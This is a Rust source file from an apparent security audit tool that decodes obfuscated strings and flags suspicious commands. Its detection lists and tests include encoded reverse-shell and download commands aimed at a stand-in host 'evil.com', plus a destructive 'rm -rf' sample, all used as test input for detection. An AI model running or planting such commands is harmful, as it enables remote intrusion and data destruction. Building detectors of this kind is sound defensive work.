Skip to main content

cc_audit/
deobfuscation.rs

1use base64::Engine;
2use regex::Regex;
3use std::sync::LazyLock;
4
5/// Deobfuscation engine for deep scanning
6pub struct Deobfuscator;
7
8static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
9    Regex::new(r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")
10        .expect("BASE64 regex")
11});
12static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
13    Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
14});
15static URL_ENCODED_PATTERN: LazyLock<Regex> =
16    LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
17static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
18    LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
19static CHAR_CODE_PATTERN: LazyLock<Regex> =
20    LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
21
22impl Deobfuscator {
23    pub fn new() -> Self {
24        Self
25    }
26
27    /// Deobfuscate content and return a list of decoded strings
28    pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
29        let mut results = Vec::new();
30
31        // Try base64 decoding
32        for decoded in self.decode_base64(content) {
33            results.push(decoded);
34        }
35
36        // Try hex decoding
37        for decoded in self.decode_hex(content) {
38            results.push(decoded);
39        }
40
41        // Try URL decoding
42        for decoded in self.decode_url(content) {
43            results.push(decoded);
44        }
45
46        // Try unicode escape decoding
47        for decoded in self.decode_unicode_escapes(content) {
48            results.push(decoded);
49        }
50
51        // Try JavaScript charCode decoding
52        for decoded in self.decode_char_code(content) {
53            results.push(decoded);
54        }
55
56        results
57    }
58
59    /// Decode base64 encoded strings
60    fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
61        let mut results = Vec::new();
62
63        for cap in BASE64_PATTERN.find_iter(content) {
64            let encoded = cap.as_str();
65            // Skip if too short or looks like random text
66            if encoded.len() < 20 {
67                continue;
68            }
69
70            if let Ok(decoded_bytes) = base64::engine::general_purpose::STANDARD.decode(encoded)
71                && let Ok(decoded_str) = String::from_utf8(decoded_bytes)
72                && self.is_suspicious(&decoded_str)
73            {
74                results.push(DecodedContent {
75                    original: encoded.to_string(),
76                    decoded: decoded_str,
77                    encoding: "base64".to_string(),
78                });
79            }
80        }
81
82        results
83    }
84
85    /// Decode hex encoded strings (\\x or 0x format)
86    fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
87        let mut results = Vec::new();
88
89        for cap in HEX_PATTERN.find_iter(content) {
90            let encoded = cap.as_str();
91
92            // Extract hex bytes
93            let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
94                encoded
95                    .split("\\x")
96                    .filter(|s| !s.is_empty())
97                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
98                    .collect()
99            } else {
100                // 0x format
101                encoded
102                    .split("0x")
103                    .filter(|s| !s.is_empty())
104                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
105                    .collect()
106            };
107
108            if let Ok(decoded_str) = String::from_utf8(hex_bytes)
109                && self.is_suspicious(&decoded_str)
110            {
111                results.push(DecodedContent {
112                    original: encoded.to_string(),
113                    decoded: decoded_str,
114                    encoding: "hex".to_string(),
115                });
116            }
117        }
118
119        results
120    }
121
122    /// Decode URL encoded strings
123    fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
124        let mut results = Vec::new();
125
126        for cap in URL_ENCODED_PATTERN.find_iter(content) {
127            let encoded = cap.as_str();
128
129            // Manual URL decoding
130            let mut decoded_bytes = Vec::new();
131            let mut chars = encoded.chars().peekable();
132
133            while let Some(c) = chars.next() {
134                if c == '%' {
135                    let hex: String = chars.by_ref().take(2).collect();
136                    if let Ok(byte) = u8::from_str_radix(&hex, 16) {
137                        decoded_bytes.push(byte);
138                    }
139                } else {
140                    decoded_bytes.push(c as u8);
141                }
142            }
143
144            if let Ok(decoded_str) = String::from_utf8(decoded_bytes)
145                && self.is_suspicious(&decoded_str)
146            {
147                results.push(DecodedContent {
148                    original: encoded.to_string(),
149                    decoded: decoded_str,
150                    encoding: "url".to_string(),
151                });
152            }
153        }
154
155        results
156    }
157
158    /// Decode unicode escape sequences (\\uXXXX)
159    fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
160        let mut results = Vec::new();
161
162        for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
163            let encoded = cap.as_str();
164            let mut decoded = String::new();
165
166            let mut chars = encoded.chars().peekable();
167            while let Some(c) = chars.next() {
168                if c == '\\' && chars.peek() == Some(&'u') {
169                    chars.next(); // consume 'u'
170                    let hex: String = chars.by_ref().take(4).collect();
171                    if let Ok(code_point) = u32::from_str_radix(&hex, 16)
172                        && let Some(ch) = char::from_u32(code_point)
173                    {
174                        decoded.push(ch);
175                    }
176                } else {
177                    decoded.push(c);
178                }
179            }
180
181            if self.is_suspicious(&decoded) {
182                results.push(DecodedContent {
183                    original: encoded.to_string(),
184                    decoded,
185                    encoding: "unicode".to_string(),
186                });
187            }
188        }
189
190        results
191    }
192
193    /// Decode JavaScript String.fromCharCode patterns
194    fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
195        let mut results = Vec::new();
196
197        for cap in CHAR_CODE_PATTERN.find_iter(content) {
198            let encoded = cap.as_str();
199
200            // Extract numbers from the pattern
201            let numbers: Vec<u32> = encoded
202                .split(|c: char| !c.is_ascii_digit())
203                .filter(|s| !s.is_empty())
204                .filter_map(|s| s.parse().ok())
205                .collect();
206
207            let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
208
209            if self.is_suspicious(&decoded) {
210                results.push(DecodedContent {
211                    original: encoded.to_string(),
212                    decoded,
213                    encoding: "charcode".to_string(),
214                });
215            }
216        }
217
218        results
219    }
220
221    /// Check if decoded content looks suspicious
222    fn is_suspicious(&self, content: &str) -> bool {
223        let suspicious_patterns = [
224            "eval",
225            "exec",
226            "bash",
227            "sh -c",
228            "/bin/",
229            "curl ",
230            "wget ",
231            "nc ",
232            "netcat",
233            "/dev/tcp",
234            "/dev/udp",
235            "base64 -d",
236            "python -c",
237            "ruby -e",
238            "perl -e",
239            "powershell",
240            "cmd.exe",
241            "rm -rf",
242            "chmod ",
243            "sudo ",
244            "password",
245            "secret",
246            "api_key",
247            "token",
248            "credential",
249            "http://",
250            "https://",
251            "ftp://",
252        ];
253
254        let content_lower = content.to_lowercase();
255        suspicious_patterns
256            .iter()
257            .any(|p| content_lower.contains(p))
258    }
259
260    /// Deep scan content - deobfuscate and return all findings
261    pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
262        use crate::scanner::ScannerConfig;
263
264        let mut findings = Vec::new();
265        let config = ScannerConfig::new();
266
267        // First scan original content
268        findings.extend(config.check_content(content, file_path));
269
270        // Then scan decoded content
271        for decoded in self.deobfuscate(content) {
272            let context = format!("{}:decoded:{}", file_path, decoded.encoding);
273
274            // Create findings for deobfuscated content
275            for mut finding in config.check_content(&decoded.decoded, &context) {
276                // Add note about deobfuscation
277                finding.message = format!(
278                    "{} [Decoded from {} encoded content]",
279                    finding.message, decoded.encoding
280                );
281                findings.push(finding);
282            }
283
284            // Also check for suspicious decoded content itself
285            if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
286                findings.push(crate::rules::Finding {
287                    id: "OB-DEEP-001".to_string(),
288                    severity: crate::rules::Severity::High,
289                    category: crate::rules::Category::Obfuscation,
290                    confidence: crate::rules::Confidence::Firm,
291                    name: "Obfuscated suspicious content".to_string(),
292                    location: crate::rules::Location {
293                        file: file_path.to_string(),
294                        line: 0,
295                        column: None,
296                    },
297                    code: decoded.original.chars().take(100).collect::<String>() + "...",
298                    message: format!(
299                        "Found {} encoded content that decodes to suspicious payload",
300                        decoded.encoding
301                    ),
302                    recommendation: "Review the decoded content for malicious commands or URLs"
303                        .to_string(),
304                    fix_hint: None,
305                    cwe_ids: vec!["CWE-116".to_string()],
306                });
307            }
308        }
309
310        findings
311    }
312
313    /// Check if content is highly suspicious (more specific than is_suspicious)
314    fn is_highly_suspicious(&self, content: &str) -> bool {
315        let highly_suspicious = [
316            "bash -i",
317            "/dev/tcp/",
318            "nc -e",
319            "rm -rf /",
320            "curl | bash",
321            "wget | sh",
322            "eval(base64",
323            "exec(decode",
324        ];
325
326        let content_lower = content.to_lowercase();
327        highly_suspicious.iter().any(|p| content_lower.contains(p))
328    }
329}
330
331impl Default for Deobfuscator {
332    fn default() -> Self {
333        Self::new()
334    }
335}
336
337/// Represents decoded content from obfuscation
338#[derive(Debug, Clone)]
339pub struct DecodedContent {
340    pub original: String,
341    pub decoded: String,
342    pub encoding: String,
343}
344
345#[cfg(test)]
346mod tests {
347    use super::*;
348
349    #[test]
350    fn test_decode_base64() {
351        let deob = Deobfuscator::new();
352        // "curl http://evil.com" in base64
353        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
354        let results = deob.decode_base64(content);
355        assert!(!results.is_empty());
356        assert!(results[0].decoded.contains("curl"));
357    }
358
359    #[test]
360    fn test_decode_hex() {
361        let deob = Deobfuscator::new();
362        // "curl" in hex
363        let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
364        let results = deob.decode_hex(content);
365        assert!(!results.is_empty());
366        assert!(results[0].decoded.contains("curl"));
367    }
368
369    #[test]
370    fn test_decode_url() {
371        let deob = Deobfuscator::new();
372        // "curl http" URL encoded
373        let content = "%63%75%72%6c%20%68%74%74%70";
374        let results = deob.decode_url(content);
375        assert!(!results.is_empty());
376        assert!(results[0].decoded.contains("curl"));
377    }
378
379    #[test]
380    fn test_decode_charcode() {
381        let deob = Deobfuscator::new();
382        // String.fromCharCode for "eval"
383        let content = "String.fromCharCode(101,118,97,108)";
384        let results = deob.decode_char_code(content);
385        assert!(!results.is_empty());
386        assert!(results[0].decoded.contains("eval"));
387    }
388
389    #[test]
390    fn test_is_suspicious() {
391        let deob = Deobfuscator::new();
392        assert!(deob.is_suspicious("curl http://example.com"));
393        assert!(deob.is_suspicious("bash -c 'evil command'"));
394        assert!(deob.is_suspicious("password=secret123"));
395        assert!(!deob.is_suspicious("hello world"));
396    }
397
398    #[test]
399    fn test_deep_scan() {
400        let deob = Deobfuscator::new();
401        // Content with highly suspicious obfuscated payload: "bash -i >& /dev/tcp/x"
402        // Base64 for "bash -i >& /dev/tcp/evil.com/1234"
403        let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
404        let findings = deob.deep_scan(content, "test.sh");
405        // Should find OB-DEEP-001 for highly suspicious decoded content
406        assert!(
407            findings
408                .iter()
409                .any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
410        );
411    }
412
413    #[test]
414    fn test_deobfuscate_empty() {
415        let deob = Deobfuscator::new();
416        let results = deob.deobfuscate("normal text without obfuscation");
417        assert!(results.is_empty());
418    }
419
420    #[test]
421    fn test_default_trait() {
422        let deob = Deobfuscator;
423        assert!(!deob.is_suspicious("hello"));
424    }
425
426    #[test]
427    fn test_decode_unicode_escapes() {
428        let deob = Deobfuscator::new();
429        // "eval" in unicode escapes
430        let content = r"\u0065\u0076\u0061\u006c";
431        let results = deob.decode_unicode_escapes(content);
432        assert!(!results.is_empty());
433        assert!(results[0].decoded.contains("eval"));
434    }
435
436    #[test]
437    fn test_decode_base64_short_string() {
438        let deob = Deobfuscator::new();
439        // Short base64 string (less than 20 chars) should be skipped
440        let content = "YWJjZA=="; // "abcd" in base64
441        let results = deob.decode_base64(content);
442        assert!(results.is_empty());
443    }
444
445    #[test]
446    fn test_decode_base64_non_suspicious() {
447        let deob = Deobfuscator::new();
448        // Long base64 but decodes to non-suspicious content
449        let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; // "this is a normal safe text"
450        let results = deob.decode_base64(content);
451        assert!(results.is_empty());
452    }
453
454    #[test]
455    fn test_decode_hex_0x_format() {
456        let deob = Deobfuscator::new();
457        // "curl" in 0x format
458        let content = "0x630x750x720x6c0x200x680x740x740x70";
459        let results = deob.decode_hex(content);
460        assert!(!results.is_empty());
461        assert!(results[0].decoded.contains("curl"));
462    }
463
464    #[test]
465    fn test_is_highly_suspicious() {
466        let deob = Deobfuscator::new();
467        assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
468        assert!(deob.is_highly_suspicious("rm -rf /"));
469        assert!(deob.is_highly_suspicious("curl | bash something"));
470        assert!(deob.is_highly_suspicious("wget | sh something"));
471        assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
472        assert!(deob.is_highly_suspicious("eval(base64"));
473        assert!(deob.is_highly_suspicious("exec(decode"));
474        assert!(!deob.is_highly_suspicious("echo hello"));
475    }
476
477    #[test]
478    fn test_deobfuscate_with_base64() {
479        let deob = Deobfuscator::new();
480        // Contains suspicious base64
481        let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; // "curl http://evil.com"
482        let results = deob.deobfuscate(content);
483        assert!(!results.is_empty());
484    }
485
486    #[test]
487    fn test_deobfuscate_multiple_encodings() {
488        let deob = Deobfuscator::new();
489        // Content with both hex and base64
490        let content =
491            r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
492        let results = deob.deobfuscate(content);
493        // Should find results from both decoders
494        assert!(!results.is_empty());
495    }
496
497    #[test]
498    fn test_deep_scan_clean_content() {
499        let deob = Deobfuscator::new();
500        let content = "normal clean content without any issues";
501        let findings = deob.deep_scan(content, "test.txt");
502        // Should have no findings for clean content
503        assert!(findings.is_empty());
504    }
505
506    #[test]
507    fn test_deep_scan_with_suspicious_decoded() {
508        let deob = Deobfuscator::new();
509        // Content with moderately suspicious base64 (triggers is_suspicious but not is_highly_suspicious)
510        let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; // "curl http://example.com/download.sh"
511        let findings = deob.deep_scan(content, "test.sh");
512        // May or may not have findings depending on scanner rules
513        // Just verify no panic
514        let _ = findings;
515    }
516
517    #[test]
518    fn test_decoded_content_debug_trait() {
519        let content = DecodedContent {
520            original: "abc".to_string(),
521            decoded: "xyz".to_string(),
522            encoding: "base64".to_string(),
523        };
524        let debug_str = format!("{:?}", content);
525        assert!(debug_str.contains("DecodedContent"));
526        assert!(debug_str.contains("abc"));
527    }
528
529    #[test]
530    fn test_decoded_content_clone_trait() {
531        let content = DecodedContent {
532            original: "abc".to_string(),
533            decoded: "xyz".to_string(),
534            encoding: "base64".to_string(),
535        };
536        let cloned = content.clone();
537        assert_eq!(content.original, cloned.original);
538        assert_eq!(content.decoded, cloned.decoded);
539        assert_eq!(content.encoding, cloned.encoding);
540    }
541
542    #[test]
543    fn test_is_suspicious_various_patterns() {
544        let deob = Deobfuscator::new();
545        assert!(deob.is_suspicious("wget http://evil.com"));
546        assert!(deob.is_suspicious("nc -l 1234"));
547        assert!(deob.is_suspicious("netcat connection"));
548        assert!(deob.is_suspicious("/dev/tcp/evil"));
549        assert!(deob.is_suspicious("/dev/udp/evil"));
550        assert!(deob.is_suspicious("base64 -d | bash"));
551        assert!(deob.is_suspicious("python -c 'import os'"));
552        assert!(deob.is_suspicious("ruby -e 'exec'"));
553        assert!(deob.is_suspicious("perl -e 'system'"));
554        assert!(deob.is_suspicious("powershell.exe"));
555        assert!(deob.is_suspicious("cmd.exe /c"));
556        assert!(deob.is_suspicious("rm -rf /tmp"));
557        assert!(deob.is_suspicious("chmod 777 file"));
558        assert!(deob.is_suspicious("sudo rm"));
559        assert!(deob.is_suspicious("api_key=secret"));
560        assert!(deob.is_suspicious("token=abc123"));
561        assert!(deob.is_suspicious("credential_store"));
562        assert!(deob.is_suspicious("ftp://server"));
563    }
564
565    #[test]
566    fn test_decode_url_non_suspicious() {
567        let deob = Deobfuscator::new();
568        // URL encoded "hello world" (non-suspicious)
569        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
570        let results = deob.decode_url(content);
571        // Should be empty because "hello world" is not suspicious
572        assert!(results.is_empty());
573    }
574
575    #[test]
576    fn test_decode_hex_non_suspicious() {
577        let deob = Deobfuscator::new();
578        // "hello" in hex - not suspicious
579        let content = r"\x68\x65\x6c\x6c\x6f";
580        let results = deob.decode_hex(content);
581        assert!(results.is_empty());
582    }
583
584    #[test]
585    fn test_decode_charcode_non_suspicious() {
586        let deob = Deobfuscator::new();
587        // "hello" in charCode - not suspicious
588        let content = "String.fromCharCode(104,101,108,108,111)";
589        let results = deob.decode_char_code(content);
590        assert!(results.is_empty());
591    }
592
593    #[test]
594    fn test_decode_unicode_non_suspicious() {
595        let deob = Deobfuscator::new();
596        // "ab" in unicode - not suspicious
597        let content = r"\u0061\u0062";
598        let results = deob.decode_unicode_escapes(content);
599        assert!(results.is_empty());
600    }
601
602    #[test]
603    fn test_deep_scan_original_content_finding() {
604        let deob = Deobfuscator::new();
605        // Content that triggers a rule via check_content
606        // Using sudo which should trigger PE-001
607        let content = "sudo rm -rf /important/files";
608        let findings = deob.deep_scan(content, "script.sh");
609        // Should find findings for sudo usage
610        assert!(!findings.is_empty());
611    }
612}